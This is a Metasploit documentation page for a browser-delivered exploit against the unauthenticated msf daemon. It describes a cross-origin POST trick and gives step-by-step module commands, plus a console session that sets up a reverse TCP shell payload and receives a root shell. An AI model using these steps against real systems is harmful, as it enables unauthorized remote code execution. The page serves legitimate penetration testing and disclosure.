metasploit-gs/documentation/modules/exploit/multi/browser/msfd_rce_browser.md

## Description

This module connects to the Metasploit msf daemon and uses the ruby interpreter
to achieve a shell. This module can be used when the vulnerable service is only
listening on localhost and the attacker has not achieved a foothold on the
machine. To achieve code execution, the data is sent from the victim's browser.
To achieve this, the victim must visit the attacker's web site.

## Vulnerable Application

[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
of providing remote access. The msf daemon provides no means of authentication
and is therefore vulnerable against an attacker who has IP access to the daemon.
In those cases where the daemon is listening on localhost, we take advantage of
the fact that the victim's web browser has IP access to the daemon.

Because the msfconsole-program is line-based, it is possible to successfully
send commands through the HTTP-protocol. This module takes advantage of this by
placing the msfconsole-command in the POST-data of a HTTP-request. Since these
POST-requests are considered safe to send cross-domain, it is possible to send
them from the attacker's web application and to localhost using the victim's
browser.

All versions of Metasploit are affected by this module, however testing has only
been performed on the following targets:

* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
  Chrome)

***NB!*** Exploitation on Windows had a higher degree of success, when the
quiet-flag was sent to the msf daemon. On Linux, it made no difference.

Source code and installers:

  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
  * [Installers](https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html)

## Verification Steps

1. Start the vulnerable service `msfd -q -f`
2. Start `msfconsole`
3. Do: `use exploit/multi/browser/msfd_rce_browser`
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
5. Do: `set RPORT [PORT]` (default: `55554`)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. Do: Visit the listed URL from the victim's machine
9. You should get a shell


## Options

Options unique for this module is described below.

  **REMOTE_IP**

  IP to target when running inside the victim's browser.

  **REMOTE_PORT**

  Remote port the vulnerable service is running at, default is 55554.


## Scenarios

### Through the victim's browser

 ```
  msf > use exploit/multi/browser/msfd_rce_browser
  msf exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
  payload => ruby/shell_reverse_tcp
  msf exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
  lhost => 192.168.0.17
  msf exploit(multi/browser/msfd_rce_browser) > set lport 443
  lport => 443
  msf exploit(multi/browser/msfd_rce_browser) > exploit
  [*] Exploit running as background job 0.

  [-] Handler failed to bind to 192.168.0.17:443:-  -
  [*] Started reverse TCP handler on 0.0.0.0:443
  msf exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
  http://0.0.0.0:8080/J5ras6oYftFWW4
  [*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
  [*] Server started.
  ```

Visit the web site listed in a browser on the victim's machine and you should
get the output below.

 ```
  [*] 192.168.0.17     msfd_rce_browser - 192.168.0.17     msfd_rce_browser
  Sending HTML...
  [*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
  id
  [*] exec: id

  uid=0(root) gid=0(root) groups=0(root)
 ```